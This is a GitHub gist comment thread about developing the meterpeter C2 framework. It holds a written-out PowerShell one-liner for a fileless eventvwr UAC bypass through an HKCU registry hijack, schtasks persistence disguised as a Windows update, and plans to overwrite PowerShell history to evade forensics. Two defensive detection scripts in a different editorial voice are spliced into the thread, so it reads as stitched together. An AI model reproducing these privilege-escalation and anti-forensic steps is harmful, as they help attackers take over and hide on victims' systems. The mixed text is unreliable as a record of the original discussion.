
@r00t-3xp10it
Created January 6, 2020 22:03
Amsi Evasion
@codings9

Let me know when I can do video✅💯🔥

@codings9

Or more tests✅💯🔥

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 18, 2020

I am currently adding a privilege escalation module to it (SDCLT)..

Remember that this bypass technique is only valid for the current process console..

(If you open another console, then AMSI will be active and working)

@codings9

codings9 commented Feb 18, 2020

Oh wow, nice ✅💯🔥, thank you. Learning a lot from you, thank you!

@r00t-3xp10it (Author)

You can get the latest version of meterpeter here: https://github.com/r00t-3xp10it/meterpeter

@codings9

Cool, adding link to Meterpeter vid✅💯🔥

@r00t-3xp10it (Author)

I am having problems triggering the SDCLT priv escal...
so.. I am going with this one, 'enigma_fileless_uac_bypass.rb', that I know works (tomorrow)...
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/local-privilege-escalation/enigma_fileless_uac_bypass.rb

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 18, 2020

Change Remote Files MACE
mace1
setmace


Change Target Desktop Wallpaper ???
next
pwned

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 20, 2020

Hey @codings9, look at this one that I've just discovered... (pure luck)...

while testing meterpeter [search for passwords in text files]....
I have noticed one file that's storing all commands being executed in PowerShell by the meterpeter client, or simply by using the PS prompt...
LOOK AT THE AMOUNT OF INFO THAT THIS FILE CONTAINS ABOUT THE PS CONSOLE PROCESS... WOW.. IT HAS THE WHOLE SCRIPT STORED..
busted


"I am...", I think to myself, from a forensic perspective... BUSTED...
so... I immediately reacted to this threat... by... rewriting the contents of that file in modules like [dellogs] or [listpass]...
nullfactor

shanty2

🥇

@codings9

codings9 commented Feb 20, 2020

Wow, that's amazing✅💯🔥, so PowerShell keeps logs?
In ConsoleHost_History - wow, great catch
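The file named above is the PSReadLine command history (ConsoleHost_History.txt), which lives in the user's profile and is plain user-writable text. The following is an added example, not code from the gist or from the meterpeter project, written from the responder's side: it locates the history file through PSReadLine's own option, preserves a hashed copy, flags a freshly rewritten but nearly empty history as a possible wipe, and contrasts it with PowerShell script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational), which a script running as the user cannot clear by overwriting a file. It assumes PSReadLine is loaded (the default since PowerShell 5.1); the evidence directory path is my own choice.

```powershell
# Added example (not from the gist): triage the PSReadLine history file and
# cross-check it against script block logging. Assumes PSReadLine is loaded.
function Get-PSHistoryTriage {
    param(
        # Assumed location for preserving a copy of the history before anything touches it.
        [string]$EvidenceDir = "$env:TEMP\ps-history-evidence"
    )

    # Usually <profile>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_History.txt
    $historyPath = (Get-PSReadLineOption).HistorySavePath
    $result = [ordered]@{ HistoryPath = $historyPath; Exists = (Test-Path $historyPath) }

    if ($result.Exists) {
        $item  = Get-Item $historyPath
        $lines = @(Get-Content $historyPath)
        $result.SizeBytes     = $item.Length
        $result.LastWriteTime = $item.LastWriteTime
        $result.LineCount     = $lines.Count
        # Tamper indicator: the file is user-writable, so a script can rewrite it at will.
        # A history that was written in the last day but holds almost nothing is suspicious.
        $result.PossiblyWiped = ($lines.Count -lt 5 -and $item.LastWriteTime -gt (Get-Date).AddDays(-1))

        # Preserve a timestamped copy and record its hash before any further handling.
        New-Item -ItemType Directory -Path $EvidenceDir -Force | Out-Null
        $copy = Join-Path $EvidenceDir ("ConsoleHost_History_{0:yyyyMMdd_HHmmss}.txt" -f (Get-Date))
        Copy-Item -Path $historyPath -Destination $copy
        $result.EvidenceCopy   = $copy
        $result.EvidenceSHA256 = (Get-FileHash -Path $copy -Algorithm SHA256).Hash
    }

    # Script block logging records executed script text in the event log, independently of
    # the history file. A count of 0 can also mean the log is disabled or not readable.
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddDays(-1)
    } -ErrorAction SilentlyContinue
    $result.ScriptBlockEvents24h = @($events).Count

    [pscustomobject]$result
}

Get-PSHistoryTriage | Format-List
```

The useful comparison is the last two fields: a near-empty history next to a non-zero 4104 count says commands ran on this host even though the local history no longer shows them. Script block logging has to be enabled by policy beforehand for that second source to exist.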

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 20, 2020

note-to-self (priv escal in persistence)

1 - persistence scheduled every 10 minutes

schtasks /create /sc minute /mo 10 /tn "taskname" /tr %tmp%\update-KB132645.vbs

schtasks

2 - privilege escalation using the fileless eventvwr technique

  • a) add HKCU key pointing to the client trigger.vbs file
  • b) schedule eventvwr to start every 10 minutes
    • schtasks at restart will start eventvwr, eventvwr starts the client trigger.vbs, client starts with SYSTEM privileges.. <- we just need to restart the target and start the meterpeter listener to wait for the connection...
New-ItemProperty HKCU\...\trigger-Client.vbs
schtasks .... eventvwr.exe

3 - restart target machine


4 - start meterpeter to receive the SYSTEM connection

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 21, 2020

Privilege Escalation in one line (oneliner)

  • 1º - reg add HKCU.. /d 'PS command to start client.ps1'
    'This reg key will auto-elevate to SYSTEM the child process spawned (Client.ps1)'..
  • 2º - Schedule a task to start eventvwr.exe every xx minutes (defined by attacker)
    'This function allows us to have time to restart meterpeter to receive the connection again from the Client'
  • 3º - Restart meterpeter to receive the SYSTEM connection back
    'This function will also allow us to persist our payload; the difference is that the Client will beacon home every xx minutes, compared with the other meterpeter persistence modules'
$Command = "cmd /R REG ADD 'HKCU\Software\Classes\mscfile\shell\open\command' /ve /t REG_SZ /d 'cmd /R powershell -Execution Bypass -w 1 -NoProfile -File %tmp%\Update-KB4524147.ps1';schtasks /create /sc minute /mo $stime /tn `"KB4524147`" /tr `"%windir%\system32\eventvwr.exe`";schtasks /Query /tn `"KB4524147`" `> dellog.txt;write-host "`n`n" `>`> dellog.txt;echo `"   Privilege Escalation beacons every: $stime (minuts)`" `>`> dellog.txt;echo `"   Restart 'meterpeter' to recive the SYSTEM connection.`" `>`> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force";

IT DOES NOT WORK: AV FLAGS THIS REGKEY ....
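The one-liner above leaves two host artifacts that do not exist on a clean system: a per-user mscfile\shell\open\command key (which overrides the HKLM handler that eventvwr.exe opens with auto-elevation) and a scheduled task whose action is eventvwr.exe. The following is an added example, not code from the gist or from the meterpeter project, that audits the current user profile for both from a defender's side and optionally removes them. It uses only built-in cmdlets; the function name and the -Remediate switch are my own.

```powershell
# Added example (not from the gist): find and optionally remove the registry handler
# and scheduled task that the thread's one-liner creates. HKCU is per user, so run
# it in the context of each profile you want to check.
function Find-EventvwrHijack {
    param([switch]$Remediate)

    $findings = @()
    $key = 'HKCU:\Software\Classes\mscfile\shell\open\command'

    if (Test-Path $key) {
        $cmd = (Get-ItemProperty -Path $key).'(default)'
        $findings += [pscustomobject]@{
            Type     = 'RegistryHijack'
            Location = $key
            Value    = $cmd
            Note     = 'User-level mscfile handler overrides HKCR; eventvwr.exe would run this elevated'
        }
        if ($Remediate) {
            # Removing the whole user-level mscfile class restores the machine default handler.
            Remove-Item -Path 'HKCU:\Software\Classes\mscfile' -Recurse -Force
        }
    }

    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($action in $task.Actions) {
            # Execute holds the program path of an exec action, e.g. %windir%\system32\eventvwr.exe
            if ($action.Execute -match 'eventvwr(\.exe)?$') {
                $findings += [pscustomobject]@{
                    Type     = 'ScheduledTask'
                    Location = "$($task.TaskPath)$($task.TaskName)"
                    Value    = "$($action.Execute) $($action.Arguments)".Trim()
                    Note     = "Author=$($task.Author); State=$($task.State)"
                }
                if ($Remediate) {
                    Unregister-ScheduledTask -TaskName $task.TaskName -TaskPath $task.TaskPath -Confirm:$false
                }
            }
        }
    }

    # For continuous detection, alert on Sysmon Event ID 13 (registry value set) for the
    # mscfile key path and on Security Event ID 4698 (scheduled task created) naming eventvwr.exe.
    $findings
}

$hits = Find-EventvwrHijack
if ($hits) { $hits | Format-Table -AutoSize } else { 'No eventvwr hijack artifacts found for the current user.' }
```

Run it without -Remediate first and keep the output: the Value field of a hit is the command the attacker wanted eventvwr.exe to launch, which is the lead for the rest of the investigation.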

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 23, 2020

Hey @codings9, I am porting the meterpeter project to venom..

I need you to test something for me...

  • execute in bash terminal
which powershell

And report back if this command checks for a PowerShell install under Linux distros

  • Question: were you required to do chmod +x meterpeter.ps1 ????

@codings9

Hey @codings9, I am porting the meterpeter project to venom..

I need you to test something for me...

execute in bash terminal
which powershell

which powershell does not execute.
To execute PowerShell in Kali I have to use
pwsh to get the PowerShell shell.
And report back if this command checks for a PowerShell install under Linux distros

Question: were you required to do chmod +x meterpeter.ps1 ????
No, not required under pwsh.
Reference:
https://youtu.be/CmMbWmN246E

@r00t-3xp10it (Author)

When you execute which powershell in the BASH terminal.. what's the response???

I don't want to start PowerShell (which presents the installed application's full path)

@codings9

Nothing, here you go:
BB0BB428-032F-4F60-A871-DEEC9C560172

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 23, 2020 via email

@r00t-3xp10it (Author)

Check these locations.

/usr/bin/pwsh
/opt/microsoft/powershell
/usr/local/share/powershell/Modules

@codings9

/usr/bin/pwsh

Exists, they reference powershell as pwsh😂🤣

@codings9

So we are looking for pwsh not powershell, lol

@codings9

which pwsh?
/usr/bin/pwsh

@r00t-3xp10it (Author)

r00t-3xp10it commented Feb 24, 2020

Excellent...

which pwsh?
/usr/bin/pwsh

I need to know if the venom user has PowerShell installed before running meterpeter.ps1.. <--- checking the existence of this folder works fine..
and I need to know if the attacker is x64 bit arch (M$ does not give PS to x32 bits).. <--- already done..

@codings9

Sweet✅💯🔥

@r00t-3xp10it (Author)

r00t-3xp10it commented Mar 1, 2020

TASK

  • Record 'meterpeter' [Windows vs Windows] official release video..

Task Description

Hey @codings9, I need your help again...

To record a video tutorial about 'meterpeter' Windows VS Windows...
using the 'new terminal windows' configured to run the meterpeter tool..

New Windows Terminal (M$)

tt



Step-By-Step

  • 1º - Download the new meterpeter project (official release)
git clone https://github.com/r00t-3xp10it/meterpeter.git

Remember to change the PATHs to point to your local meterpeter installation

1º - Create a new GUID for the meterpeter tool
     To create a new GUID visit: http://new-guid.com/

2º - press the <'settings'> button in 'new terminal' and copy-paste the following code under
     "profiles":  -> "list":

            },  // <-- REMEMBER TO ADD , AFTER THE PREVIOUS CLOSING BRACKET ...
                // BEFORE ADDING A NEW PROFILE TO YOUR PROFILE.JSON FILE

            {
                // Make changes here to the meterpeter profile
                "guid": "{1972e6a7-daef-4cfc-8180-3eecfef9630d}",
                "name": "meterpeter C2",
                "fontFace": "Cascadia Code",
                "backgroundImageStretchMode" : "uniformToFill",
                "backgroundImage" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\darkside.gif",  // <-- Terminal animated background gif Path
                "commandline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NoExit -File \"%USERPROFILE%\\Desktop\\meterpeter\\meterpeter.ps1\"",    // <-- meterpeter.ps1 script Path
                "startingDirectory" : "%USERPROFILE%\\Desktop\\meterpeter",               // <-- meterpeter folder Path
                "icon" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\Alien-icon.png",  // <-- Terminal tab icon Path
                "hidden": false
            }

[i] my profile.json file (Configuration example)

[i] meterpeter WIKI pages

@codings9

codings9 commented Mar 1, 2020

Doing the video, just be aware that the ps1 file was not downloaded via the bat - I manually moved it to disk and ran it. And Windows picks up the file as soon as it touches disk, sample submission off. I had to allow it for the video - I think I understand why Microsoft bought GitHub... now... they have access to all of this... code... Don't worry, will not show on video.

@codings9

codings9 commented Mar 1, 2020

The Terminal is amazing love the integration with MeterPeter✅💯🔥

@codings9

codings9 commented Mar 2, 2020

@r00t-3xp10it (Author)

Hey, thanks.. I've just arrived home..

@codings9

codings9 commented Mar 2, 2020

Lol, no worries anytime...✅💯🔥, thank you!

@r00t-3xp10it (Author)

👍
